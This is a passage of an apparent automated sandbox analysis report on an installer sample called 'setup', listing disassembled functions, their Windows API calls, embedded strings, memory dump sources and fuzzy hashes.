                                                                                                                                                                              • Instruction Fuzzy Hash: C6912C71A00348AFDB14DFA5CD95BAEBBF9FB08700F14852AF516EA291E774A904CB50
                                                                                                                                                                              Function 00BD7C10 Relevance: 22.7, APIs: 15, Instructions: 178windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00BD7C77
                                                                                                                                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BD7C85
                                                                                                                                                                              • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00BD7C9F
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BD7CB7
                                                                                                                                                                              • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00BD7CE8
                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 00BD7D22
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BD7D39
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BD7D55
                                                                                                                                                                              • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00BD7D80
                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 00BD7D9D
                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 00BD7DB4
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BD7DC4
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000136,?,?), ref: 00BD7DD5
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BD7DEB
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BD7DF0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageRectSend$Create$DeleteObject$ClientClipParentSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1236051970-0
                                                                                                                                                                              • Opcode ID: 0877aed18c286f8cc34132e15999f1d9a944feb4eca8fd377b4657f8fee2604b
                                                                                                                                                                              • Instruction ID: d4d74bd6f3e079956f825ecc3dbc05853b83701a4d98dd9eb86c76e52b0fcf9b
                                                                                                                                                                              • Opcode Fuzzy Hash: 0877aed18c286f8cc34132e15999f1d9a944feb4eca8fd377b4657f8fee2604b
                                                                                                                                                                              • Instruction Fuzzy Hash: 39610572940218AFDB119FE5DD49BEEBBB9FF08710F200126F619EB2A0DB746954CB50
                                                                                                                                                                              Function 00BDC690 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 358libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BDC7B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BDC7D1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BDC7DD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BDC7EA
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                                                                              • String ID: build $20.9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI$d71a6aa0
                                                                                                                                                                              • API String ID: 2564778481-2118497109
                                                                                                                                                                              • Opcode ID: ea80a71db05b6dd5cdf61bbe2c06940738f86928e2014ff783789bb996163c34
                                                                                                                                                                              • Instruction ID: 7d17eee2ebf4477023d65591a277e1b6ff18fa4f8856fac3cb5fc36f9b07aeab
                                                                                                                                                                              • Opcode Fuzzy Hash: ea80a71db05b6dd5cdf61bbe2c06940738f86928e2014ff783789bb996163c34
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17E7190020AAFDB04DFA4CC55BEEBBF4FF09714F14465AE815A7391EB74AA44CBA0
                                                                                                                                                                              Function 00BAEED0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 233libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BAEEDE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEEE4
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BAEF17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEF1D
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E172AC,00000000,00000000,00000000), ref: 00BAF03D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF086
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2454113998
                                                                                                                                                                              • Opcode ID: 3072c14a04cfb1ab71b7e335d98b4d70fef67db6eba045dc8e271e2c7562e762
                                                                                                                                                                              • Instruction ID: 87ddb64ee7b5ea7efabc44630063662377239f460908492a55eb4e34f2498939
                                                                                                                                                                              • Opcode Fuzzy Hash: 3072c14a04cfb1ab71b7e335d98b4d70fef67db6eba045dc8e271e2c7562e762
                                                                                                                                                                              • Instruction Fuzzy Hash: 24916C30D0820AEFDB24DFA8C895BEDB7F1EF59300F248169E411B7291EB719A45CB60
                                                                                                                                                                              Function 00D00070 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA16AC,02141699,?,00000010), ref: 00D000AC
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000010,02141699,?,00000010), ref: 00D000B9
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D000EB
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000), ref: 00D000F4
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00E1727C,00000001,?,?,?,00000000), ref: 00D00176
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000), ref: 00D0017F
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D001B5
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D001BE
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00E1A104,00000002,?,?,00000019,00000000,?,?,?,00000000), ref: 00D0021F
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D00228
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D00258
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 201293332-3261393531
                                                                                                                                                                              • Opcode ID: 3c27e5e3867b068fc9912bc38e623f9022e40f9767411d9b2e544b0ca6f4d4b6
                                                                                                                                                                              • Instruction ID: 7febd93dc75893f1454c19b861004b07b3eb862046cd84130da6880f0fb43064
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c27e5e3867b068fc9912bc38e623f9022e40f9767411d9b2e544b0ca6f4d4b6
                                                                                                                                                                              • Instruction Fuzzy Hash: 93619B30905644EFEB00DFA9CD49BAABBB4FF09310F148258F855A72A1D7319958CBA1
                                                                                                                                                                              Function 00BC12D0 Relevance: 18.3, APIs: 12, Instructions: 337windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC1324
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC1403
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC1415
                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00BC1427
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BC1454
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 00BC1496
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC14A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: RectWindow$CompatibleCreate$BitmapClientObjectSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2032541772-0
                                                                                                                                                                              • Opcode ID: aac09c5a65d173e00cb41c68fdfe8e2575a7c7e2c5629c52d79c4ba7072caf89
                                                                                                                                                                              • Instruction ID: 38ff02441fabca239cd03c4dc3b14b85bfc77a6a2a4b4932d389738657401773
                                                                                                                                                                              • Opcode Fuzzy Hash: aac09c5a65d173e00cb41c68fdfe8e2575a7c7e2c5629c52d79c4ba7072caf89
                                                                                                                                                                              • Instruction Fuzzy Hash: C7E11871D01218DFDB21DFA9C948B9EBBF8EF59710F2442AAE809F7251DB706A44CB50
                                                                                                                                                                              Function 00BB6F60 Relevance: 18.1, APIs: 12, Instructions: 139windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BB6F9E
                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 00BB6FBD
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BB6FC4
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BB701F
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BB7038
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BB7045
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BB7057
                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 00BB7080
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BB708A
                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000008,00000008,00000000,00000000,00000000,00CC0020), ref: 00BB70C7
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00BB70D2
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00BB70D9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectRect$Delete$ClientCompatibleCreateFillSelect$Bitmap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 441990398-0
                                                                                                                                                                              • Opcode ID: 0e0972d1f2e0aeafc4d8a524762870e480c97ff7ec852a8d2ef6b04ebea34b98
                                                                                                                                                                              • Instruction ID: e5ead86cd291d6d6e6c377420e58f783bf76ceef30071ba5ba903cbd94e9e762
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e0972d1f2e0aeafc4d8a524762870e480c97ff7ec852a8d2ef6b04ebea34b98
                                                                                                                                                                              • Instruction Fuzzy Hash: 60418232104301AFD7219F65DD49F6BBBE8EB88701F10483BF656D21A0DBB1E8098B21
                                                                                                                                                                              Function 00BE7100 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 469synchronizationthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00BE72B0,00E1C158,00000000,?), ref: 00BE722A
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00BE7243
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BE7259
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                              • String ID: r
                                                                                                                                                                              • API String ID: 51348343-3729450569
                                                                                                                                                                              • Opcode ID: 9d681445973563cdf011d57ca2587fa14e8abe5fc7765ca4d8429dd4400f157e
                                                                                                                                                                              • Instruction ID: aa8b4fd3e89bef1f7a6f44fa56b876553fb2f4b6586d194375bc358d4da223f3
                                                                                                                                                                              • Opcode Fuzzy Hash: 9d681445973563cdf011d57ca2587fa14e8abe5fc7765ca4d8429dd4400f157e
                                                                                                                                                                              • Instruction Fuzzy Hash: FE027D70D04248DFDB14CFA9C945BAEBBF8FF45714F20829DE815AB291DB749A44CBA0
                                                                                                                                                                              Function 00D01930 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 324synchronizationfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00D01C42
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • ResetEvent.KERNEL32(00000000,02141699,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01CDF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01CFF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01D0A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInit_thread_footerObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                                                                                                                                              • String ID: TEST$http://www.example.com$http://www.google.com$http://www.yahoo.com$tin9999.tmp
                                                                                                                                                                              • API String ID: 3248508590-625802988
                                                                                                                                                                              • Opcode ID: e27ac2c185a5c9d1c4db55dda385094b9fdaaf2fa050fe23fa31c2622f0c0ad0
                                                                                                                                                                              • Instruction ID: 496d1a442978dcae6ec02733771ce0d70f0362862ee154e5e6cd04463fd2bbbd
                                                                                                                                                                              • Opcode Fuzzy Hash: e27ac2c185a5c9d1c4db55dda385094b9fdaaf2fa050fe23fa31c2622f0c0ad0
                                                                                                                                                                              • Instruction Fuzzy Hash: 77C10335905249DFDB24DF68CD45BEEBBB4FF01310F148269E81A9B2D1EB709A04CBA1
                                                                                                                                                                              Function 00D015B0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 302libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              • GetLastError.KERNEL32(02141699,?,?,?,00DF66ED,000000FF,?,00CE39A2,?), ref: 00D0161D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 00D017AD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 00D01806
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00DF66ED,000000FF,?,00CE39A2,?), ref: 00D018F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$DirectoryErrorFreeLastLibrarySystem
                                                                                                                                                                              • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                                                                                                                                              • API String ID: 2155880084-4043905686
                                                                                                                                                                              • Opcode ID: a88824f7284b1aedcf8426779e6d18f55921726959a7358d6764ff7772aafc72
                                                                                                                                                                              • Instruction ID: f79f8d24a40646f186657ee7a83f84923174a01c485063c6fe54688b87b0c2c8
                                                                                                                                                                              • Opcode Fuzzy Hash: a88824f7284b1aedcf8426779e6d18f55921726959a7358d6764ff7772aafc72
                                                                                                                                                                              • Instruction Fuzzy Hash: 10C18A74A00209DFDB04DFA8C994B9DBBF4EF49314F188169E809EB391DB719945CFA1
                                                                                                                                                                              Function 00BAD3E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157processsynchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD4E8
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD4F2
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD501
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00BAD51E
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD528
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD535
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD53F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
